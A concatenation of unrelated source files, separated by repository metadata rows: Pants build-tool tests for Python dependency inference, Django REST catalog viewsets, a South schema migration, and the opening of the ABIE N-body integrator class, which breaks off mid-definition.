Address("src/python/ambiguous", target_name="main", relative_file_path="main.py")
) == InferredDependencies(
[
Address(
"src/python/ambiguous",
target_name="dep1",
relative_file_path="disambiguated_via_ignores.py",
)
],
)
assert len(caplog.records) == 1
assert "The target src/python/ambiguous/main.py:main imports `ambiguous.dep`" in caplog.text
assert "['src/python/ambiguous/dep.py:dep1', 'src/python/ambiguous/dep.py:dep2']" in caplog.text
assert "disambiguated_via_ignores.py" not in caplog.text
def test_infer_python_assets(caplog) -> None:
rule_runner = RuleRunner(
rules=[
*import_rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
QueryRule(InferredDependencies, [InferPythonImportDependencies]),
],
target_types=[
PythonSourcesGeneratorTarget,
PythonRequirementTarget,
ResourcesGeneratorTarget,
FilesGeneratorTarget,
],
)
rule_runner.write_files(
{
"src/python/data/BUILD": "resources(name='jsonfiles', sources=['*.json'])",
"src/python/data/db.json": "",
"src/python/data/db2.json": "",
"src/python/data/flavors.txt": "",
"configs/prod.txt": "",
"src/python/app.py": dedent(
"""\
pkgutil.get_data(__name__, "data/db.json")
pkgutil.get_data(__name__, "data/db2.json")
open("configs/prod.txt")
"""
),
"src/python/f.py": dedent(
"""\
idk_kinda_looks_resourcey = "data/db.json"
CustomResourceType("data/flavors.txt")
"""
),
"src/python/BUILD": dedent(
"""\
python_sources()
# Also test assets declared from parent dir
resources(
name="txtfiles",
sources=["data/*.txt"],
)
"""
),
"configs/BUILD": dedent(
"""\
files(
name="configs",
sources=["prod.txt"],
)
"""
),
}
)
def run_dep_inference(address: Address) -> InferredDependencies:
args = [
"--source-root-patterns=src/python",
"--python-infer-assets",
]
rule_runner.set_options(args, env_inherit={"PATH", "PYENV_ROOT", "HOME"})
target = rule_runner.get_target(address)
return rule_runner.request(
InferredDependencies,
[
InferPythonImportDependencies(
PythonImportDependenciesInferenceFieldSet.create(target)
)
],
)
assert run_dep_inference(
Address("src/python", relative_file_path="app.py")
) == InferredDependencies(
[
Address("src/python/data", target_name="jsonfiles", relative_file_path="db.json"),
Address("src/python/data", target_name="jsonfiles", relative_file_path="db2.json"),
Address("configs", target_name="configs", relative_file_path="prod.txt"),
],
)
assert run_dep_inference(
Address("src/python", relative_file_path="f.py")
) == InferredDependencies(
[
Address("src/python/data", target_name="jsonfiles", relative_file_path="db.json"),
Address("src/python", target_name="txtfiles", relative_file_path="data/flavors.txt"),
],
)
# Test handling of ambiguous assets. We should warn on the ambiguous dependency, but not warn
# on the disambiguated one and should infer a dep.
caplog.clear()
rule_runner.write_files(
{
"src/python/data/BUILD": dedent(
"""\
resources(name='jsonfiles', sources=['*.json'])
resources(name='also_jsonfiles', sources=['*.json'])
resources(name='txtfiles', sources=['*.txt'])
"""
),
"src/python/data/ambiguous.json": "",
"src/python/data/disambiguated_with_bang.json": "",
"src/python/app.py": dedent(
"""\
pkgutil.get_data(__name__, "data/ambiguous.json")
pkgutil.get_data(__name__, "data/disambiguated_with_bang.json")
"""
),
"src/python/BUILD": dedent(
"""\
python_sources(
name="main",
dependencies=['!./data/disambiguated_with_bang.json:also_jsonfiles'],
)
"""
),
# Both a resource relative to the module and file with conspicuously similar paths
"src/python/data/both_file_and_resource.txt": "",
"data/both_file_and_resource.txt": "",
"data/BUILD": "files(name='txtfiles', sources=['*.txt'])",
"src/python/assets_bag.py": "ImAPathType('data/both_file_and_resource.txt')",
}
)
assert run_dep_inference(
Address("src/python", target_name="main", relative_file_path="app.py")
) == InferredDependencies(
[
Address(
"src/python/data",
target_name="jsonfiles",
relative_file_path="disambiguated_with_bang.json",
),
],
)
assert len(caplog.records) == 1
assert "The target src/python/app.py:main uses `data/ambiguous.json`" in caplog.text
assert (
"['src/python/data/ambiguous.json:also_jsonfiles', 'src/python/data/ambiguous.json:jsonfiles']"
in caplog.text
)
assert "disambiguated_with_bang.py" not in caplog.text
caplog.clear()
assert run_dep_inference(
Address("src/python", target_name="main", relative_file_path="assets_bag.py")
) == InferredDependencies([])
assert len(caplog.records) == 1
assert (
"The target src/python/assets_bag.py:main uses `data/both_file_and_resource.txt`"
in caplog.text
)
assert (
"['data/both_file_and_resource.txt:txtfiles', 'src/python/data/both_file_and_resource.txt:txtfiles']"
in caplog.text
)
@pytest.mark.parametrize("behavior", InitFilesInference)
def test_infer_python_inits(behavior: InitFilesInference) -> None:
rule_runner = RuleRunner(
rules=[
*ancestor_files.rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
infer_python_init_dependencies,
SubsystemRule(PythonInferSubsystem),
QueryRule(InferredDependencies, (InferInitDependencies,)),
],
target_types=[PythonSourcesGeneratorTarget],
objects={"parametrize": Parametrize},
)
rule_runner.set_options(
[
f"--python-infer-init-files={behavior.value}",
"--python-resolves={'a': '', 'b': ''}",
"--python-default-resolve=a",
"--python-enable-resolves",
],
env_inherit=PYTHON_BOOTSTRAP_ENV,
)
rule_runner.write_files(
{
"src/python/root/__init__.py": "content",
"src/python/root/BUILD": "python_sources(resolve=parametrize('a', 'b'))",
"src/python/root/mid/__init__.py": "",
"src/python/root/mid/BUILD": "python_sources()",
"src/python/root/mid/leaf/__init__.py": "content",
"src/python/root/mid/leaf/f.py": "",
"src/python/root/mid/leaf/BUILD": "python_sources()",
"src/python/type_stub/__init__.pyi": "content",
"src/python/type_stub/foo.pyi": "",
"src/python/type_stub/BUILD": "python_sources()",
}
)
def check(address: Address, expected: list[Address]) -> None:
target = rule_runner.get_target(address)
result = rule_runner.request(
InferredDependencies,
[InferInitDependencies(InitDependenciesInferenceFieldSet.create(target))],
)
if behavior == InitFilesInference.never:
expected = []
assert result == InferredDependencies(expected)
check(
Address("src/python/root/mid/leaf", relative_file_path="f.py"),
[
Address(
"src/python/root", relative_file_path="__init__.py", parameters={"resolve": "a"}
),
*(
[]
if behavior is InitFilesInference.content_only
else [Address("src/python/root/mid", relative_file_path="__init__.py")]
),
Address("src/python/root/mid/leaf", relative_file_path="__init__.py"),
],
)
check(
Address("src/python/type_stub", relative_file_path="foo.pyi"),
[Address("src/python/type_stub", relative_file_path="__init__.pyi")],
)
def test_infer_python_conftests() -> None:
rule_runner = RuleRunner(
rules=[
*ancestor_files.rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
infer_python_conftest_dependencies,
SubsystemRule(PythonInferSubsystem),
QueryRule(InferredDependencies, (InferConftestDependencies,)),
],
target_types=[PythonTestsGeneratorTarget, PythonTestUtilsGeneratorTarget],
objects={"parametrize": Parametrize},
)
rule_runner.set_options(
[
"--source-root-patterns=src/python",
"--python-resolves={'a': '', 'b': ''}",
"--python-default-resolve=a",
"--python-enable-resolves",
],
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
)
rule_runner.write_files(
{
"src/python/root/conftest.py": "",
"src/python/root/BUILD": "python_test_utils(resolve=parametrize('a', 'b'))",
"src/python/root/mid/conftest.py": "",
"src/python/root/mid/BUILD": "python_test_utils()",
"src/python/root/mid/leaf/conftest.py": "",
"src/python/root/mid/leaf/this_is_a_test.py": "",
"src/python/root/mid/leaf/BUILD": "python_test_utils()\npython_tests(name='tests')",
}
)
def run_dep_inference(address: Address) -> InferredDependencies:
target = rule_runner.get_target(address)
return rule_runner.request(
InferredDependencies,
[InferConftestDependencies(ConftestDependenciesInferenceFieldSet.create(target))],
)
assert run_dep_inference(
Address(
"src/python/root/mid/leaf", target_name="tests", relative_file_path="this_is_a_test.py"
)
) == InferredDependencies(
[
Address(
"src/python/root", relative_file_path="conftest.py", parameters={"resolve": "a"}
),
Address("src/python/root/mid", relative_file_path="conftest.py"),
Address("src/python/root/mid/leaf", relative_file_path="conftest.py"),
],
)
@pytest.fixture
def imports_rule_runner() -> RuleRunner:
return mk_imports_rule_runner([])
def mk_imports_rule_runner(more_rules: Iterable) -> RuleRunner:
return RuleRunner(
rules=[
*more_rules,
*import_rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
*python_requirements.rules(),
QueryRule(InferredDependencies, [InferPythonImportDependencies]),
],
target_types=[
PythonSourceTarget,
PythonSourcesGeneratorTarget,
PythonRequirementTarget,
PythonRequirementsTargetGenerator,
],
objects={"parametrize": Parametrize},
)
def test_infer_python_strict(imports_rule_runner: RuleRunner, caplog) -> None:
    """Exercise `[python-infer].unowned_dependency_behavior` on an unowned import.

    "warning" mode logs, "error" mode raises; every mode passes once the import
    is owned via an explicit python_requirement, a requirements.txt generator,
    or a first-party module of the same name.
    """
    imports_rule_runner.write_files(
        {
            "src/python/cheesey.py": dedent(
                """\
                import venezuelan_beaver_cheese
                "japanese.sage.derby"
                """
            ),
            "src/python/BUILD": "python_sources()",
        }
    )

    def run_dep_inference(unowned_dependency_behavior: str) -> InferredDependencies:
        # Options are re-set per call so each behavior mode starts clean.
        imports_rule_runner.set_options(
            [
                f"--python-infer-unowned-dependency-behavior={unowned_dependency_behavior}",
                "--python-infer-string-imports",
            ],
            env_inherit=PYTHON_BOOTSTRAP_ENV,
        )
        target = imports_rule_runner.get_target(
            Address("src/python", relative_file_path="cheesey.py")
        )
        return imports_rule_runner.request(
            InferredDependencies,
            [
                InferPythonImportDependencies(
                    PythonImportDependenciesInferenceFieldSet.create(target)
                )
            ],
        )

    # "warning" mode: one log record naming the unowned import; the string
    # import ("japanese.sage.derby") is not reported.
    run_dep_inference("warning")
    assert len(caplog.records) == 1
    assert (
        "cannot infer owners for the following imports in the target src/python/cheesey.py:"
        in caplog.text
    )
    assert " * venezuelan_beaver_cheese (line: 1)" in caplog.text
    assert "japanese.sage.derby" not in caplog.text

    # "error" mode: inference fails outright.
    with engine_error(UnownedDependencyError, contains="src/python/cheesey.py"):
        run_dep_inference("error")
    caplog.clear()

    # All modes should be fine if the module is explicitly declared as a requirement
    imports_rule_runner.write_files(
        {
            "src/python/BUILD": dedent(
                """\
                python_requirement(
                    name="venezuelan_beaver_cheese",
                    modules=["venezuelan_beaver_cheese"],
                    requirements=["venezuelan_beaver_cheese==1.0.0"],
                )
                python_sources(dependencies=[":venezuelan_beaver_cheese"])
                """
            ),
        }
    )
    for mode in UnownedDependencyUsage:
        run_dep_inference(mode.value)
        assert not caplog.records

    # All modes should be fine if the module is implicitly found via requirements.txt
    imports_rule_runner.write_files(
        {
            "src/python/requirements.txt": "venezuelan_beaver_cheese==1.0.0",
            "src/python/BUILD": dedent(
                """\
                python_requirements(name='reqs')
                python_sources()
                """
            ),
        }
    )
    for mode in UnownedDependencyUsage:
        run_dep_inference(mode.value)
        assert not caplog.records

    # All modes should be fine if the module is owned by a first party
    imports_rule_runner.write_files(
        {
            "src/python/venezuelan_beaver_cheese.py": "",
            "src/python/BUILD": "python_sources()",
        }
    )
    for mode in UnownedDependencyUsage:
        run_dep_inference(mode.value)
        assert not caplog.records
def test_infer_python_strict_multiple_resolves(imports_rule_runner: RuleRunner) -> None:
    """When an import is unowned in the target's resolve, the error message must
    list the other resolves (and addresses) where an owner does exist."""
    imports_rule_runner.write_files(
        {
            "project/base.py": "",
            "project/utils.py": "",
            "project/app.py": "import project.base\nimport project.utils",
            "project/BUILD": dedent(
                """\
                python_source(
                    name="base",
                    source="base.py",
                    resolve="a",
                )
                python_source(
                    name="utils",
                    source="utils.py",
                    resolve=parametrize("a", "b"),
                )
                python_source(
                    name="app",
                    source="app.py",
                    resolve="z",
                )
                """
            ),
        }
    )
    imports_rule_runner.set_options(
        [
            "--python-infer-unowned-dependency-behavior=error",
            "--python-enable-resolves",
            "--python-resolves={'a': '', 'b': '', 'z': ''}",
        ],
        env_inherit=PYTHON_BOOTSTRAP_ENV,
    )
    # `app` lives in resolve "z", but its two imports are only owned in "a"/"b".
    tgt = imports_rule_runner.get_target(Address("project", target_name="app"))
    expected_error = softwrap(
        """
        These imports are not in the resolve used by the target (`z`), but they were present in
        other resolves:
        * project.base: 'a' from project:base
        * project.utils: 'a' from project:utils@resolve=a, 'b' from project:utils@resolve=b
        """
    )
    with engine_error(UnownedDependencyError, contains=expected_error):
        imports_rule_runner.request(
            InferredDependencies,
            [InferPythonImportDependencies(PythonImportDependenciesInferenceFieldSet.create(tgt))],
        )
class TestCategoriseImportsInfo:
    """Unit tests for `_get_imports_info`, which classifies each parsed import
    by ownership status (unambiguous, disambiguated, unownable, weakly
    ignored, or unowned)."""

    address = Address("sample/path")
    # Each entry maps an import name to (parsed import info, owners found for it).
    # The second element of ParsedPythonImportInfo is the "weak" flag.
    import_cases = {
        "unambiguous": (
            ParsedPythonImportInfo(0, False),
            PythonModuleOwners((Address("unambiguous.py"),)),
        ),
        "unambiguous_with_pyi": (
            ParsedPythonImportInfo(0, False),
            PythonModuleOwners(
                (
                    Address("unambiguous_with_pyi.py"),
                    Address("unambiguous_with_pyi.pyi"),
                )
            ),
        ),
        "ambiguous_disambiguatable": (
            ParsedPythonImportInfo(0, False),
            PythonModuleOwners(
                tuple(),
                (
                    Address("ambiguous_disambiguatable", target_name="good"),
                    Address("ambiguous_disambiguatable", target_name="bad"),
                ),
            ),
        ),
        "ambiguous_terminal": (
            ParsedPythonImportInfo(0, False),
            PythonModuleOwners(
                tuple(),
                (
                    Address("ambiguous_disambiguatable", target_name="bad0"),
                    Address("ambiguous_disambiguatable", target_name="bad1"),
                ),
            ),
        ),
        "json": (
            ParsedPythonImportInfo(0, False),
            PythonModuleOwners(tuple()),
        ),  # unownable
        "os.path": (
            ParsedPythonImportInfo(0, False),
            PythonModuleOwners(tuple()),
        ),  # unownable, not root module
        "weak_owned": (
            ParsedPythonImportInfo(0, True),
            PythonModuleOwners((Address("weak_owned.py"),)),
        ),
        "weak_unowned": (
            ParsedPythonImportInfo(0, True),
            PythonModuleOwners(tuple()),
        ),
        "unowned": (
            ParsedPythonImportInfo(0, False),
            PythonModuleOwners(tuple()),
        ),
    }

    def filter_case(self, case_name: str, cases=None):
        """Return a single-entry dict for `case_name` (defaults to `import_cases`)."""
        cases = cases or self.import_cases
        return {case_name: cases[case_name]}

    def separate_owners_and_imports(
        self,
        imports_to_owners: dict[str, tuple[ParsedPythonImportInfo, PythonModuleOwners]],
    ) -> tuple[list[PythonModuleOwners], ParsedPythonImports]:
        """Split the mapping into the parallel inputs `_get_imports_info` expects."""
        owners_per_import = [x[1] for x in imports_to_owners.values()]
        parsed_imports = ParsedPythonImports({k: v[0] for k, v in imports_to_owners.items()})
        return owners_per_import, parsed_imports

    def do_test(self, case_name: str, expected_status: ImportOwnerStatus) -> ImportResolveResult:
        """Run `_get_imports_info` on one case and assert the resulting status."""
        owners_per_import, parsed_imports = self.separate_owners_and_imports(
            self.filter_case(case_name)
        )
        resolve_result = _get_imports_info(
            self.address,
            owners_per_import,
            parsed_imports,
            # The "bad" candidate is explicitly ignored, which allows the
            # "ambiguous_disambiguatable" case to be disambiguated to "good".
            ExplicitlyProvidedDependencies(
                self.address,
                FrozenOrderedSet(),
                FrozenOrderedSet((Address("ambiguous_disambiguatable", target_name="bad"),)),
            ),
        )
        assert len(resolve_result) == 1 and case_name in resolve_result
        resolved = resolve_result[case_name]
        assert resolved.status == expected_status
        return resolved

    def test_unambiguous_imports(self, imports_rule_runner: RuleRunner) -> None:
        case_name = "unambiguous"
        resolved = self.do_test(case_name, ImportOwnerStatus.unambiguous)
        assert resolved.address == self.import_cases[case_name][1].unambiguous

    def test_unambiguous_with_pyi(self, imports_rule_runner: RuleRunner) -> None:
        case_name = "unambiguous_with_pyi"
        resolved = self.do_test(case_name, ImportOwnerStatus.unambiguous)
        assert resolved.address == self.import_cases[case_name][1].unambiguous

    def test_unownable_root(self, imports_rule_runner: RuleRunner) -> None:
        case_name = "json"
        self.do_test(case_name, ImportOwnerStatus.unownable)

    def test_unownable_nonroot(self, imports_rule_runner: RuleRunner) -> None:
        case_name = "os.path"
        self.do_test(case_name, ImportOwnerStatus.unownable)

    def test_weak_owned(self, imports_rule_runner: RuleRunner) -> None:
        case_name = "weak_owned"
        resolved = self.do_test(case_name, ImportOwnerStatus.unambiguous)
        assert resolved.address == self.import_cases[case_name][1].unambiguous

    def test_weak_unowned(self, imports_rule_runner: RuleRunner) -> None:
        case_name = "weak_unowned"
        resolved = self.do_test(case_name, ImportOwnerStatus.weak_ignore)
        assert resolved.address == tuple()

    def test_unowned(self, imports_rule_runner: RuleRunner) -> None:
        case_name = "unowned"
        resolved = self.do_test(case_name, ImportOwnerStatus.unowned)
        assert resolved.address == tuple()

    def test_ambiguous_disambiguatable(self):
        case_name = "ambiguous_disambiguatable"
        resolved = self.do_test(case_name, ImportOwnerStatus.disambiguated)
        assert resolved.address == (self.import_cases[case_name][1].ambiguous[0],)

    def test_ambiguous_not_disambiguatable(self):
        case_name = "ambiguous_terminal"
        resolved = self.do_test(case_name, ImportOwnerStatus.unowned)
        assert resolved.address == ()
class TestFindOtherOwners:
    """Tests for `_find_other_owners_for_unowned_imports`: when an import has
    no owner in the current resolve, report owners found in other resolves."""

    missing_import_name = "missing"
    other_resolve = "other-resolve"
    other_other_resolve = "other-other-resolve"

    @staticmethod
    @rule
    async def run_rule(
        req: UnownedImportsPossibleOwnersRequest,
    ) -> UnownedImportsPossibleOwners:
        # Thin @rule wrapper so the private helper can be driven via the engine.
        return await _find_other_owners_for_unowned_imports(req)

    @pytest.fixture
    def _imports_rule_runner(self):
        """RuleRunner with the wrapper rule and its QueryRule registered."""
        return mk_imports_rule_runner(
            [
                self.run_rule,
                QueryRule(UnownedImportsPossibleOwners, [UnownedImportsPossibleOwnersRequest]),
            ]
        )

    def do_test(self, imports_rule_runner: RuleRunner):
        """Configure three resolves, then ask for possible owners of the
        missing import from the perspective of "original_resolve"."""
        resolves = {"python-default": "", self.other_resolve: "", self.other_other_resolve: ""}
        imports_rule_runner.set_options(
            [
                "--python-enable-resolves",
                f"--python-resolves={resolves}",
            ]
        )
        imports_rule_runner.write_files(
            {
                "project/cheesey.py": dedent(
                    f"""\
                    import other.{self.missing_import_name}
                    """
                ),
                "project/BUILD": "python_sources()",
            }
        )
        return imports_rule_runner.request(
            UnownedImportsPossibleOwners,
            [
                UnownedImportsPossibleOwnersRequest(
                    frozenset((f"other.{self.missing_import_name}",)), "original_resolve"
                )
            ],
        )

    def test_no_other_owners_found(self, _imports_rule_runner):
        r = self.do_test(_imports_rule_runner)
        assert not r.value

    def test_other_owners_found_in_single_resolve(self, _imports_rule_runner: RuleRunner):
        # Add an owner in exactly one other resolve.
        _imports_rule_runner.write_files(
            {
                "other/BUILD": dedent(
                    f"""\
                    python_source(
                        name="{self.missing_import_name}",
                        source="{self.missing_import_name}.py",
                        resolve="{self.other_resolve}",
                    )
                    """
                ),
                f"other/{self.missing_import_name}.py": "",
            }
        )
        r = self.do_test(_imports_rule_runner)
        as_module = f"other.{self.missing_import_name}"
        assert as_module in r.value
        assert r.value[as_module] == [
            (
                Address("other", target_name=self.missing_import_name),
                self.other_resolve,
            )
        ]

    def test_other_owners_found_in_multiple_resolves(self, _imports_rule_runner: RuleRunner):
        # The owner is parametrized over two resolves; both should be reported.
        _imports_rule_runner.write_files(
            {
                "other/BUILD": dedent(
                    f"""\
                    python_source(
                        name="{self.missing_import_name}",
                        source="{self.missing_import_name}.py",
                        resolve=parametrize("{self.other_resolve}", "{self.other_other_resolve}"),
                    )
                    """
                ),
                f"other/{self.missing_import_name}.py": "",
            }
        )
        r = self.do_test(_imports_rule_runner)
        as_module = f"other.{self.missing_import_name}"
        assert as_module in r.value
        assert r.value[as_module] == [
            (
                Address(
                    "other",
                    target_name=self.missing_import_name,
                    parameters={"resolve": resolve},
                ),
                resolve,
            )
            for resolve in (self.other_other_resolve, self.other_resolve)
        ]
| [
"noreply@github.com"
] | noreply@github.com |
a3f81763f9e1a8d13b8b807682abb096f73ffb0f | 1351256bdbd6d98fa6383a41f8db317ded419c05 | /apps/catalog/api/v1/views.py | bb1f9d8b5d7ba46dd395742735ee2d37dd1d7651 | [] | no_license | medinan/test | 64b0eb7fa593dc2e5fac14e8b09640d760ffc30e | 350fcaf141d3611d80368279799b3fb8d1136304 | refs/heads/master | 2023-09-05T05:50:07.117190 | 2021-10-25T22:10:12 | 2021-10-25T22:10:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,218 | py | from django_filters import rest_framework as filters
from rest_framework import viewsets
from apps.catalog.api.v1.filters import (
CategoryFilterSet,
BrandFilterSet,
ProductFilterSet,
)
from apps.catalog.api.v1.serializers import (
BrandSerializer,
CategorySerializer,
ProductSerializer,
ProductReadOnlySerializer,
)
from apps.catalog.models import Category, Brand, Product
from apps.events_tracker.tasks import ProductViewEventTrackingTask
from utils.restframework import permissions
class CategoryViewSet(viewsets.ModelViewSet):
    """
    Categories view set.

    list: Returns a list of categories; visible to all users.
    retrieve: Returns a single category; visible to all users.
    create: Create a category; enabled only for admin users.
    delete: Delete a category; enabled only for admin users.
    update: Update a category; enabled only for admin users.
    partial_update: Partially update a category; enabled only for admin users.
    """

    queryset = Category.objects.all()
    serializer_class = CategorySerializer
    # Anonymous/regular users get read-only access; writes require staff.
    permission_classes = (permissions.ReadOnlyOrUserStaff,)
    filter_backends = (filters.DjangoFilterBackend,)
    filterset_class = CategoryFilterSet
class BrandViewSet(viewsets.ModelViewSet):
    """
    Brands view set.

    list: Returns a list of brands; visible to all users.
    retrieve: Returns a single brand; visible to all users.
    create: Create a brand; enabled only for admin users.
    delete: Delete a brand; enabled only for admin users.
    update: Update a brand; enabled only for admin users.
    partial_update: Partially update a brand; enabled only for admin users.
    """

    queryset = Brand.objects.all()
    serializer_class = BrandSerializer
    # Anonymous/regular users get read-only access; writes require staff.
    permission_classes = (permissions.ReadOnlyOrUserStaff,)
    filter_backends = (filters.DjangoFilterBackend,)
    filterset_class = BrandFilterSet
class ProductViewSet(viewsets.ModelViewSet):
    """
    Products view set.

    list: Returns a list of products; visible to all users.
    retrieve: Returns a single product; visible to all users.
    create: Create a product; enabled only for admin users.
    delete: Delete a product; enabled only for admin users.
    update: Update a product; enabled only for admin users.
    partial_update: Partially update a product; enabled only for admin users.
    """

    queryset = Product.objects.all()
    serializer_class = ProductSerializer
    # Anonymous/regular users get read-only access; writes require staff.
    permission_classes = (permissions.ReadOnlyOrUserStaff,)
    filter_backends = (filters.DjangoFilterBackend,)
    filterset_class = ProductFilterSet

    def get_serializer_class(self):
        # The list endpoint uses a lighter, read-only serializer.
        if self.action == "list":
            return ProductReadOnlySerializer
        return super().get_serializer_class()

    def retrieve(self, request, *args, **kwargs):
        # Record a product-view event asynchronously (Celery-style .delay),
        # so analytics tracking does not block the response.
        product_instance = self.get_object()
        ProductViewEventTrackingTask().delay(product_instance.pk)
        return super(ProductViewSet, self).retrieve(request, *args, **kwargs)
| [
"noreply@github.com"
] | noreply@github.com |
3ebb0f00c40798b1ba5e4fb96bbb2223a3c119af | 8cc0a129738ef3b23d678c35cd9e118054990b9a | /calo_social/calo_social/friends/migrations/0003_auto__del_field_relationship_prueba_south.py | dd4485668e0e0e2aacc1109a66f9b706c62c0a72 | [] | no_license | adahlquist89/calo | 74ac41dc9af72fb32dcccbe24e76410276acbcb2 | 686c529e32221251383a612694ba254f84a28061 | refs/heads/master | 2021-01-10T20:10:45.997181 | 2013-09-09T20:12:14 | 2013-09-09T20:12:14 | 12,094,151 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,306 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Relationship.prueba_south'
db.delete_column(u'friends_relationship', 'prueba_south')
def backwards(self, orm):
# Adding field 'Relationship.prueba_south'
db.add_column(u'friends_relationship', 'prueba_south',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'friends.relationship': {
'Meta': {'unique_together': "[('from_user', 'to_user')]", 'object_name': 'Relationship'},
'accepted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['auth.User']"})
},
u'friends.suggestion': {
'Meta': {'unique_together': "[('from_user', 'to_user')]", 'object_name': 'Suggestion'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'relationship': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['friends.Relationship']", 'null': 'True', 'blank': 'True'}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['auth.User']"})
}
}
complete_apps = ['friends'] | [
"fran.dorr@gmail.com"
] | fran.dorr@gmail.com |
bc22cdb682ffd44df71b11ce3d8efee59f611392 | ba74367ce35aec6fb3b0985b03cdc28798d6faba | /ABIE/abie.py | 7608b8898989c322ee63f81e8958255351558ae2 | [] | no_license | maxwelltsai/ABIE | e2e85163a44f01bbfa3ef4ef2e76666bdbf307ed | a6c36fbd2ce3bfa125a81a1512ff30dcbdcb9c19 | refs/heads/master | 2021-06-11T01:36:09.466921 | 2021-04-13T12:36:32 | 2021-04-13T12:36:32 | 152,776,610 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,895 | py | """
Alice-Bob Integrator Environment (ABIE), created by Alice and Bob in the Moving Planets Around (MPA) project.
Features:
1. The integrator takes input either from the commandline, or from the config file
2. The integrator periodically stores data to HDF5
3. The integrator supports restarting simulations
The MPA team, 2017-2018
"""
import argparse
import toml
from integrator import Integrator
import numpy as np
import sys
from data_io import DataIO
class ABIE(object):
    """Facade around the active N-body integrator.

    Most run parameters (time step, termination time, output cadence, close
    encounter / collision bookkeeping) exist both on this object and on the
    integrator instance.  While no integrator is attached the values are
    cached locally; once an integrator is set, the property getters/setters
    keep the two copies in sync.
    """

    def __init__(self):
        # =================== CONSTANTS ==================
        # By default, the square of the Gaussian gravitational constant.
        self.__CONST_G = 0.000295912208232213  # units: (AU^3/day^2)
        self.__CONST_C = 0.0  # speed of light; PN terms will be calculated if CONST_C > 0

        # =================== VARIABLES ==================
        self.__t = 0.0
        self.__t_start = 0.0
        self.__t_end = 0.0
        self.__h = 0.0
        self.__store_dt = 100  # output is triggered per 100 time units
        self.__buffer_len = 1024  # size of a dataset in a hdf5 group
        self.__max_close_encounter_events = 1
        self.__max_collision_events = 1
        self.__close_encounter_distance = 0.0

        # Integrator modules are loaded lazily.
        self.__integrators = None  # a collection of integrators loaded from modules
        self.__integrator = None  # the actual, active integrator instance
        self.output_file = 'data.hdf5'
        self.__close_encounter_output_file = 'close_encounters.txt'
        self.__collision_output_file = 'collisions.txt'

    @property
    def max_close_encounter_events(self):
        """Maximum number of close-encounter events to record."""
        if self.__integrator is not None:
            self.__max_close_encounter_events = self.__integrator.max_close_encounter_events
        return self.__max_close_encounter_events

    @max_close_encounter_events.setter
    def max_close_encounter_events(self, value):
        self.__max_close_encounter_events = value
        if self.__integrator is not None:
            self.__integrator.max_close_encounter_events = value

    @property
